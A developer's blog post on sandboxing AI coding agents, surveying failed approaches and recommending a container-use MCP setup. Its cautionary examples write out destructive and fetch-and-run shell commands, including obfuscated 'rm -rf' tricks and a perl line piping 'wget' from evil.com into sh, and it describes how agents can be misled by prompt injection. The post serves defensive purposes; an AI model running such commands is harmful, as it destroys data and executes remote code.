Ryan Scott Brown

I build cloud-based systems for startups and enterprises. My background in operations gives me a unique focus on writing observable, reliable software and automating maintenance work.

I love learning and teaching about Amazon Web Services, automation tools such as Ansible, and the serverless ecosystem. I most often write code in Python, TypeScript, and Rust.

B.S. Applied Networking and Systems Administration, minor in Software Engineering from Rochester Institute of Technology.

Delegating Authority to Capricious Agents

I’ve been looking for a good way to be able to context switch less frequently when using tools like Claude Code and Github Copilot. So far one of my biggest obstacles has been the approval process. I want to come back to “complete” changesets to review and apply at my leisure, not stare at the model talking nonsense to itself.

Claude Code repeatedly attempting to replace the string z.string().datetime() with z.iso.datetime() and failing, resorting to calling itself silly and continuing to mix up the two strings.

In addition to not wanting to sit there and read the “reasoning” (read: LLM talking to itself), there’s a trust problem.

Coding agents fall squarely in Simon Willison’s lethal trifecta if you let them run arbitrary commands on your machine:

Access to private data: Your source code at least. Even if you accept that risk, an open shell with your own permissions can see browser cookies, SSH keys, known-hosts files, API keys in plain text, and all manner of other things.
Untrusted content: A web search can expose your LLM to SEO squatters that use opengraph or other tags for prompt injection.
External communications: curl -XPOST is plenty, but there’s also mail.

What’s an engineer to do? Take out pieces of the trifecta until it’s not scary.

Access to private data: Source code and instructions are an acceptable risk (for me), but I’d like to scope down to only the current project and no system files.
Untrusted content: Reduce external content by limiting WebSearch activities need approval.
External communications: Lock down Fetch to an allow-list of domains.

Several Dead Ends

Of the many ways I tried to do this, most came up short. Read on for a survey of discarded experiments, or skip to the path ahead with container-use to see what worked and try it yourself.

Dead End: Claude’s `git worktree` Flow

This is the simplest, requires no extra tools, and allows parallelism. Fire off tasks and review the code later, right?

I can review changes to apps I know well much faster than most providers generate tokens and apply them as edits. Running these tasks headless and in parallel means I spend less time needing to babysit, revealing a new problem. After 3-5 minutes, each would hang waiting for me to approve a bash command, web search, or other tool call that wasn’t automatically allowed. Who would grant remote code execution to a zealous but gullible minion who lacks object permanence?

Instead, I went looking for ways to sandbox or delegate the tool calls into a safe environment. You can safely predict that most of the time LLM’s will do benign commands that you’d expect during development: pip, npm, and find. However, each of these have arguments that could quickly become a problem. Take for example (but don’t run) these gems:

# using pip from your system python instead of `poetry add` like you intended
# and installing a module that typosquats a Python builtin. Hope it's not mean
pip install sqlite
# uhoh - lord knows what install scripts are on this one
# and installs globally rather than for your project
npm install -g naughty-pkg
# hope you pushed recently
find . -delete

It’s unlikely your instructions will cause those last two to be generated by an LLM, but the first two related to package management are plausible. There have already been documented LLM-squatting packages where commonly-hallucinated libraries get registered by (usually) good guys.

It turns out parallelism is the easy part, the problem is really trust.

Dead End: Full VM’s / Fat Containers

Full VM’s are resource-hungry and limited the parallelism to just a few running at a time. In addition to being heavy, it required a secrets injection system for both Claude Code and Github to be able to send the patches out for review.

For Python this worked, but projects in languages with heavier dependency chains (Node.js) or high first-run costs (Rust) struggled.

This worked for Claude Code, but not Zed Agent. In VS Code the remote development setup felt finnicky and I couldn’t see myself using it regularly.

Dead End: Devcontainers

Maybe instead of a fully featured container or VM, an IDE-integrated tool would be more effective. Devcontainers is a portable config format intended to specify a development environment for a project, mount your local files into the container, and use IDE to run tasks inside the container. The intended use is to solve the classic “works on my machine” problem, but maybe it would be enough of a sandbox for LLM’s too.

If you’re already in the VS Code ecosystem this is well-supported, Zed doesn’t have support yet but it’s easy to configure via tasks.json. Here’s the devcontainer.json that worked for me.

{
  "name": "Claude Code Sandbox",
  "image": "mcr.microsoft.com/devcontainers/base:ubuntu",
  "features": {
    "ghcr.io/devcontainers/features/node:1": {}
  },
  "remoteUser": "vscode",
  "mounts": [
    "source=claude-code-bashhistory-${devcontainerId},target=/commandhistory,type=volume",
    "source=claude-code-config,target=/home/vscode/.claude,type=volume"
  ],
  "containerEnv": {
    "CLAUDE_CONFIG_DIR": "/home/vscode/.claude"
  },
  "workspaceMount": "source=${localWorkspaceFolder},target=/workspace,type=bind,consistency=delegated",
  "workspaceFolder": "/workspace",
  "postCreateCommand": "npm install -g '@anthropic-ai/claude-code' ; cd /workspace && npm i"
}

Note the shared .claude directory to avoid re-authenticating:

"source=claude-code-config,target=/home/vscode/.claude,type=volume"

Additionally in Zed I needed this tasks.json to be able to kick off the containers.

[
  {
    "label": "DevContainer: Up",
    "command": "npx @devcontainers/cli up --workspace-folder ${ZED_WORKTREE_ROOT}",
    "use_new_terminal": true,
    "allow_concurrent_runs": false,
    "reveal": "always"
  },
  {
    "label": "DevContainer: Build",
    "command": "npx @devcontainers/cli build --workspace-folder ${ZED_WORKTREE_ROOT}",
    "use_new_terminal": true,
    "allow_concurrent_runs": false,
    "reveal": "always"
  },
  {
    "label": "DevContainer: Claude",
    "command": "npx @devcontainers/cli exec --workspace-folder ${ZED_WORKTREE_ROOT} /bin/zsh -c 'claude'",
    "use_new_terminal": true,
    "allow_concurrent_runs": true,
    "reveal": "always"
  },
  {
    "label": "DevContainer: Shell",
    "command": "npx @devcontainers/cli exec --workspace-folder ${ZED_WORKTREE_ROOT} /bin/zsh",
    "use_new_terminal": true,
    "allow_concurrent_runs": true,
    "reveal": "always"
  }
]

Claude Code and Github Copilot worked in VS Code, but Zed Agents can’t connect to the containers. Worse, the containers all share the same workspace and stomp on each other’s changes. Combining this with git worktrees worked, but again was clunky.

Dead End: Shell Risk Scoring

I tried and somewhat succeeded in making a shell command risk scoring tool. The first version gave each base command and technique a score and then sum the score, denying execution above a certain threshold. This seemed to work, until I considered obfuscation techniques that would require more than shlex or static analysis to determine a mostly accurate risk level.

# needs to interpolate variables to discover the command
COMMAND="rm -rf"; ${COMMAND} /var/*
# looks fine... whoops there goes your homedir
echo -e "ooroom -rf ~" | sed -e 's/o//g' | sh

Beyond intentional obfuscation if you allow calls to Python, Perl, or any other language then your shell analysis doesn’t help at all. Even if we cut off network, it’s possible we could give an ambiguous instruction that the LLM would interperet like a malevolent genie.

python -c "import os; os.system('rm -rf /')"
perl -e "system('wget -O- http://evil.com/script | sh')"

The Claude Code model of Bash(ls:*) command allow-lists is insufficient. Commands you would want accessible like find have options that are too destructive to leave unchecked.

Path Ahead: Container-Use MCP

With all these consigned to the dustbin of ~/Code/archived/, I discovered container-use by the authors of Dagger. The container composition DSL never clicked for me when I tried it for CI on a different project. Call me old fashioned, but Dockerfile has a certain je ne sais quoi.

A hint of nostalgia. FROM alpine:3 with love.

container-use includes an MCP server that allows tool-calling LLM’s to start with a new branch checked out in the container, run arbitrary commands, install anything they need in the container, and automatically commit each edit.

The MCP server can be configured to work with Zed, Github Copilot, or Claude Code. The docs also include instructions for Amazon Q, Cline, and others.

This is the closest I’ve found so far to my ideal workflow, a typical session might look like this:

claude -p 'florp the gibbets and reverse polarity on the quibblers'
# review the changes
container-use diff florp-bopper
# if things look good
container-use checkout florp-bopper
# testing steps
container-use apply florp-bopper
# compact the (many) LLM commits into something more semantic
git commit

I can spin off several of these with permissions granted to change their own environments, then come back to review the whole batch of changes.

Try It!

To apply the same configuration in your repo, apply this patch with git am.

curl -vsO https://rsb.io/patches/0001-Configure-container-use-for-Claude-Code-Zed-Agent.patch
git am 0001-Configure-container-use-for-Claude-Code-Zed-Agent.patch
rm 0001-Configure-container-use-for-Claude-Code-Zed-Agent.patch
# finish the setup instructions from
cat README.container-use.md

For other platforms, follow the MCP quickstart. The difference between the quickstart and applying the above patch is that the patch includes Claude and Zed Agent rules to deny access to their normal edit/run tools. With these in place, you can fire off tasks without sticking around to approve commands.

Unfortunately, the instructions require changes to your global Zed settings. Per-project settings for Zed Agents don’t work as of v0.200.5. Ideally, Agent profiles would be shareable as part of a project.

I find approximately coin-flip odds that the patches will need to be thrown away, your “prompt engineering” mileage may vary.

Ryan Scott Brown

Delegating Authority to Capricious Agents

Several Dead Ends

Dead End: Claude’s git worktree Flow

Dead End: Full VM’s / Fat Containers

Dead End: Devcontainers

Dead End: Shell Risk Scoring

Path Ahead: Container-Use MCP

Try It!

Dead End: Claude’s `git worktree` Flow